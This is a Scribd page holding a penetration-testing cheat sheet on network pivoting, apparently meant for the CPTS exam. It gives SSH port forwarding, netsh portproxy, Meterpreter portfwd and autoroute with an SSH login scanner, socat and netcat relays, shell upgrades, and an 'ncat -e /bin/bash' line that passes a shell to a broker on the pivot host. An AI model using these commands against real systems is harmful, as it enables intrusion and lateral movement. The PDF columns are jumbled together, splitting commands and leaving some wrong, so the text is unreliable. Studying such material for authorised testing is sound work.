[go: up one dir, main page]
Scribd
Upload
365 views2 pages

Pivoting Techniques for CPTS Exam

This document provides a cheat sheet for pivoting through networks using various techniques like SSH port forwarding, SSH sessions, PowerShell remoting, Metasploit autorouting, socat, netcat, and ncat. It demonstrates how to pivot from an attacker system through an intermediate pivot system to access services on a targeted victim system for the purpose of post-exploitation command execution and lateral movement.

Uploaded by

Karo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
365 views2 pages

Pivoting Techniques for CPTS Exam

This document provides a cheat sheet for pivoting through networks using various techniques like SSH port forwarding, SSH sessions, PowerShell remoting, Metasploit autorouting, socat, netcat, and ncat. It demonstrates how to pivot from an attacker system through an intermediate pivot system to access services on a targeted victim system for the purpose of post-exploitation command execution and lateral movement.

Uploaded by

Karo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

netsh Port Proxy Upgrade Ugly Shells (pick one!

)
pivot c:\> netsh interface $ python -c 'import pty;
portproxy add v4tov4 [Link]("/bin/bash")'
Pivoting
listenport=4000 $ ruby -e 'exec "/bin/sh"'
Cheat Sheet v1.1
listenaddress=[Link] $ /bin/sh -i or /bin/bash -i [Link]/offensive-operations
connectport=22 $ perl -e 'exec "/bin/sh";'
connectaddress=[Link] Purpose
attacker $ ssh Further Upgrade Ugly Shells Navigating a client/victim environment often
victimadmin@[Link] Things seem off? Sometimes this can return requires pivoting from target to target, and
functionality like arrow keys in a shell. there are many ways to do so. This cheat
Don’t Forget the Easy Stuff! victim $ <Ctrl>z sheet runs through various options for
attacker $ stty raw -echo different environments and situations.
SSH trail through Linux:
attacker $ fg
attacker $ ssh
victim $ reset
How to Use this Sheet
pivotAdmin@[Link]
pivot $ ssh
victim $ export SHELL=bash Find a method that may fit your situation. In
victimAdmin@[Link]
victim $ export TERM=xterm- each, we model an attacker pivoting through
256color pivot to reach SSH on victim. Substitute
victim $ stty rows 40 columns hosts and ports to fit your need.
PowerShell sessions through Windows:
80
attacker PS C:\> Enter-
PsSession –ComputerName Pay attention to prompts as they will identify
Maintain State with Screen the host where the command should be run
[Link]
victim $ session -S hackinz AND what type of prompt, i.e. Windows
Or RDP session over Windows:
- Session fails [Link] (c:\>), PowerShell (PS), or Linux
attacker c:\> [Link]
- Regain session, THEN: ($ or #). The diagram in the center should
/v:[Link]
[Link] victim $ session -r hackinz help.
Now, with command execution on pivot:
Want more functionality than screen? Replace terms like victimAdmin and
pivot C:\> ssh
Check out tmux. victimPass with appropriate credentials
victimadmin@[Link]
Is your connection not stable enough for for the given system.
No SSH available? How about PuTTY?
ssh? mosh is more forgiving of spotty
connections. On the back, there are some extra goodies -
Note that even if all the hosts in the chain
like how to upgrade an ugly Netcat shell to
run Windows, you can’t typically PsSession
Manage Many SSH Connections something that feels more like a real Bash
twice because of how credentials are used.
Run a search for pssession double session.
Check out ProxyJump [Link]/config to
hop for more info. manage a wide array of ssh connections. Have fun, good luck, and pivot mercilessly!
SSH Pivots Require an sshd Setting Situation Meterpreter Port Forward
Set GatewayPorts yes in You need to access SSH on port 22 of victim, pivot Meterpreter > portfwd
/etc/ssh/sshd_config, then: but you can’t go directly due to those add –l 4000 –p 22 –r
pivot # systemctl restart sshd meddling firewalls. For simplicity, this sheet [Link]
will generally be using ports 1337, 4000, and attacker $ ssh
SSH Local Port Forward 22 on the Attacker, Pivot, and Victim victimadmin@[Link] -P 4000
machines.
attacker $ ssh -fNL Metasploit/Meterpreter Autoroute
1337:[Link]
pivoter@[Link] pivot Meterpreter > run
attacker $ ssh [Link] post/multi/manage/autoroute
SUBNET=pivotSubnet CMD=add
victimadmin@localhost -P 1337
pivot Meterpreter > background
pivot msf > use
SSH Remote Port Forward :22 scanner/ssh/ssh_login
pivot $ ssh -fNR pivot msf > set RHOSTS

[Link]
1337:[Link] [Link]
attacker@[Link] pivot msf > set USERNAME
attacker $ ssh victimAdmin
victimadmin@localhost -P 1337 pivot msf > set PASSWORD
:4000 victimPass
Proxychains pivot msf > run
attacker $ ssh
pivotadmin@[Link] -D 9050 -
[Link] Socat Port Forward
fN pivot $ socat TCP-
attacker $ proxychains ssh LISTEN:4000,fork
victimadmin@[Link] :1337 TCP:[Link]
attacker $ ssh
And check /etc/[Link] Netcat Port Forward victimadmin@[Link] -P 4000
pivot $ cd /tmp && mknod
Some SSH Command Line Options Ncat Connection Brokering
backpipe p
-f put ssh in the background after pivot $ nc -lvp 4000 Assumes code execution on victim
connecting 0<backpipe | nc -v [Link] pivot$ ncat -vlp 4000 --broker
-N don’t execute a command; just forward 22 1>backpipe victim$ ncat [Link] 4000 -e
some ports attacker $ ssh /bin/bash
-P num use “num” port for ssh victimadmin@[Link] -P 4000 attacker$ ncat [Link] 4000

You might also like